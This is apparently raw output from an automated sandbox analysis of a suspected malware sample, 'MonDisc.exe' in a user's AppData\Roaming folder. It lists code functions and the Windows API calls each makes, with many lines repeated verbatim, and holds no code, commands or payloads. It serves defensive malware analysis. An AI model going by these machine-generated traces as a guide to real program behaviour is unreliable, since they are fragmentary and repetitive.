Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F8F3E GetParent,IsIconic,GetMessageExtraInfo,GetWindowTextLengthW,AnyPopup,GetWindowTextLengthW,GetUserDefaultLangID,GetForegroundWindow,GetDoubleClickTime,GetCurrentProcessId,GetUserDefaultLangID,GetModuleHandleW,IsZoomed,15_2_00007FF62C8F8F3E
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F512F GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetModuleHandleW,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetTopWindow,GetParent,GetLastActivePopup,IsIconic,GetTopWindow,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetSystemDefaultLangID,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetDoubleClickTime,IsIconic,GetModuleHandleW,15_2_00007FF62C8F512F
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F512F GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetModuleHandleW,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetTopWindow,GetParent,GetLastActivePopup,IsIconic,GetTopWindow,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetSystemDefaultLangID,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetDoubleClickTime,IsIconic,GetModuleHandleW,15_2_00007FF62C8F512F
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F512F GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetModuleHandleW,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetTopWindow,GetParent,GetLastActivePopup,IsIconic,GetTopWindow,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetSystemDefaultLangID,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetDoubleClickTime,IsIconic,GetModuleHandleW,15_2_00007FF62C8F512F
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F512F GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetModuleHandleW,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetTopWindow,GetParent,GetLastActivePopup,IsIconic,GetTopWindow,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetSystemDefaultLangID,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetDoubleClickTime,IsIconic,GetModuleHandleW,15_2_00007FF62C8F512F
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F512F GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetModuleHandleW,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetTopWindow,GetParent,GetLastActivePopup,IsIconic,GetTopWindow,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetSystemDefaultLangID,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetDoubleClickTime,IsIconic,GetModuleHandleW,15_2_00007FF62C8F512F
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F5117 GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetModuleHandleW,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetTopWindow,GetParent,GetLastActivePopup,IsIconic,GetTopWindow,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetDoubleClickTime,IsIconic,GetModuleHandleW,15_2_00007FF62C8F5117
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F5117 GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetModuleHandleW,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetTopWindow,GetParent,GetLastActivePopup,IsIconic,GetTopWindow,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetDoubleClickTime,IsIconic,GetModuleHandleW,15_2_00007FF62C8F5117
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F5117 GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetModuleHandleW,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetTopWindow,GetParent,GetLastActivePopup,IsIconic,GetTopWindow,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetDoubleClickTime,IsIconic,GetModuleHandleW,15_2_00007FF62C8F5117
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F5117 GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetModuleHandleW,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetTopWindow,GetParent,GetLastActivePopup,IsIconic,GetTopWindow,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetDoubleClickTime,IsIconic,GetModuleHandleW,15_2_00007FF62C8F5117
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F5117 GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetModuleHandleW,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetTopWindow,GetParent,GetLastActivePopup,IsIconic,GetTopWindow,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetDoubleClickTime,IsIconic,GetModuleHandleW,15_2_00007FF62C8F5117
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F8202 GetCurrentProcess,GetTopWindow,IsIconic,GetMessageTime,GetLastActivePopup,GetDesktopWindow,GetTopWindow,GetCurrentProcess,AnyPopup,GetLargePageMinimum,GetMessageTime,GetCurrentProcessId,GetTopWindow,GetModuleHandleW,GetMessageExtraInfo,GetTopWindow,GetCurrentProcessId,GetTickCount,GetCurrentProcess,GetLastActivePopup,GetLastActivePopup,GetParent,GetDesktopWindow,GetUserDefaultLangID,GetForegroundWindow,GetForegroundWindow,GetLargePageMinimum,GetMessageExtraInfo,GetLargePageMinimum,GetParent,IsIconic,GetMessageExtraInfo,GetWindowTextLengthW,AnyPopup,GetWindowTextLengthW,GetUserDefaultLangID,15_2_00007FF62C8F8202
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F8202 GetCurrentProcess,GetTopWindow,IsIconic,GetMessageTime,GetLastActivePopup,GetDesktopWindow,GetTopWindow,GetCurrentProcess,AnyPopup,GetLargePageMinimum,GetMessageTime,GetCurrentProcessId,GetTopWindow,GetModuleHandleW,GetMessageExtraInfo,GetTopWindow,GetCurrentProcessId,GetTickCount,GetCurrentProcess,GetLastActivePopup,GetLastActivePopup,GetParent,GetDesktopWindow,GetUserDefaultLangID,GetForegroundWindow,GetForegroundWindow,GetLargePageMinimum,GetMessageExtraInfo,GetLargePageMinimum,GetParent,IsIconic,GetMessageExtraInfo,GetWindowTextLengthW,AnyPopup,GetWindowTextLengthW,GetUserDefaultLangID,15_2_00007FF62C8F8202
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F516F GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetModuleHandleW,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetTopWindow,GetParent,GetLastActivePopup,IsIconic,GetTopWindow,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetSystemDefaultLangID,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetDoubleClickTime,IsIconic,GetModuleHandleW,15_2_00007FF62C8F516F
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F516F GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetModuleHandleW,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetTopWindow,GetParent,GetLastActivePopup,IsIconic,GetTopWindow,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetSystemDefaultLangID,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetDoubleClickTime,IsIconic,GetModuleHandleW,15_2_00007FF62C8F516F
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F516F GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetModuleHandleW,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetTopWindow,GetParent,GetLastActivePopup,IsIconic,GetTopWindow,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetSystemDefaultLangID,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetDoubleClickTime,IsIconic,GetModuleHandleW,15_2_00007FF62C8F516F
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F516F GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetModuleHandleW,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetTopWindow,GetParent,GetLastActivePopup,IsIconic,GetTopWindow,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetSystemDefaultLangID,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetDoubleClickTime,IsIconic,GetModuleHandleW,15_2_00007FF62C8F516F
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F516F GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetModuleHandleW,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetTopWindow,GetParent,GetLastActivePopup,IsIconic,GetTopWindow,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetSystemDefaultLangID,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetDoubleClickTime,IsIconic,GetModuleHandleW,15_2_00007FF62C8F516F
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F5191 GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetModuleHandleW,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetTopWindow,GetParent,GetLastActivePopup,IsIconic,GetTopWindow,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetSystemDefaultLangID,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetDoubleClickTime,IsIconic,GetModuleHandleW,15_2_00007FF62C8F5191
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F5191 GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetModuleHandleW,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetTopWindow,GetParent,GetLastActivePopup,IsIconic,GetTopWindow,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetSystemDefaultLangID,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetDoubleClickTime,IsIconic,GetModuleHandleW,15_2_00007FF62C8F5191
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F5191 GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetModuleHandleW,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetTopWindow,GetParent,GetLastActivePopup,IsIconic,GetTopWindow,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetSystemDefaultLangID,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetDoubleClickTime,IsIconic,GetModuleHandleW,15_2_00007FF62C8F5191
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F5191 GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetModuleHandleW,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetTopWindow,GetParent,GetLastActivePopup,IsIconic,GetTopWindow,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetSystemDefaultLangID,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetDoubleClickTime,IsIconic,GetModuleHandleW,15_2_00007FF62C8F5191
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F5191 GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetModuleHandleW,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetTopWindow,GetParent,GetLastActivePopup,IsIconic,GetTopWindow,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetSystemDefaultLangID,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetDoubleClickTime,IsIconic,GetModuleHandleW,15_2_00007FF62C8F5191
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F517B GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetModuleHandleW,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetTopWindow,GetParent,GetLastActivePopup,IsIconic,GetTopWindow,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetSystemDefaultLangID,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetDoubleClickTime,IsIconic,GetModuleHandleW,15_2_00007FF62C8F517B
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F517B GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetModuleHandleW,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetTopWindow,GetParent,GetLastActivePopup,IsIconic,GetTopWindow,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetSystemDefaultLangID,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetDoubleClickTime,IsIconic,GetModuleHandleW,15_2_00007FF62C8F517B
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F517B GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetModuleHandleW,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetTopWindow,GetParent,GetLastActivePopup,IsIconic,GetTopWindow,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetSystemDefaultLangID,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetDoubleClickTime,IsIconic,GetModuleHandleW,15_2_00007FF62C8F517B
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F517B GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetModuleHandleW,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetTopWindow,GetParent,GetLastActivePopup,IsIconic,GetTopWindow,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetSystemDefaultLangID,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetDoubleClickTime,IsIconic,GetModuleHandleW,15_2_00007FF62C8F517B
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F517B GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetModuleHandleW,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetTopWindow,GetParent,GetLastActivePopup,IsIconic,GetTopWindow,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetSystemDefaultLangID,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetDoubleClickTime,IsIconic,GetModuleHandleW,15_2_00007FF62C8F517B
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F82C7 GetTopWindow,IsIconic,GetMessageTime,GetLastActivePopup,GetDesktopWindow,GetTopWindow,GetCurrentProcess,AnyPopup,GetLargePageMinimum,GetMessageTime,GetCurrentProcessId,GetTopWindow,GetModuleHandleW,GetMessageExtraInfo,GetTopWindow,GetCurrentProcessId,GetTickCount,GetCurrentProcess,GetLastActivePopup,GetLastActivePopup,GetParent,GetDesktopWindow,GetUserDefaultLangID,GetForegroundWindow,GetForegroundWindow,GetLargePageMinimum,GetMessageExtraInfo,GetLargePageMinimum,GetParent,IsIconic,GetMessageExtraInfo,GetWindowTextLengthW,AnyPopup,GetWindowTextLengthW,GetUserDefaultLangID,15_2_00007FF62C8F82C7
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F82C7 GetTopWindow,IsIconic,GetMessageTime,GetLastActivePopup,GetDesktopWindow,GetTopWindow,GetCurrentProcess,AnyPopup,GetLargePageMinimum,GetMessageTime,GetCurrentProcessId,GetTopWindow,GetModuleHandleW,GetMessageExtraInfo,GetTopWindow,GetCurrentProcessId,GetTickCount,GetCurrentProcess,GetLastActivePopup,GetLastActivePopup,GetParent,GetDesktopWindow,GetUserDefaultLangID,GetForegroundWindow,GetForegroundWindow,GetLargePageMinimum,GetMessageExtraInfo,GetLargePageMinimum,GetParent,IsIconic,GetMessageExtraInfo,GetWindowTextLengthW,AnyPopup,GetWindowTextLengthW,GetUserDefaultLangID,15_2_00007FF62C8F82C7
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F832A AnyPopup,IsIconic,GetMessageTime,GetLastActivePopup,GetDesktopWindow,GetTopWindow,GetCurrentProcess,AnyPopup,GetLargePageMinimum,GetMessageTime,GetCurrentProcessId,GetTopWindow,GetModuleHandleW,GetMessageExtraInfo,GetTopWindow,GetCurrentProcessId,GetTickCount,GetCurrentProcess,GetLastActivePopup,GetLastActivePopup,GetParent,GetDesktopWindow,GetUserDefaultLangID,GetForegroundWindow,GetForegroundWindow,GetLargePageMinimum,GetMessageExtraInfo,GetLargePageMinimum,GetParent,IsIconic,GetMessageExtraInfo,GetWindowTextLengthW,AnyPopup,GetWindowTextLengthW,GetUserDefaultLangID,15_2_00007FF62C8F832A
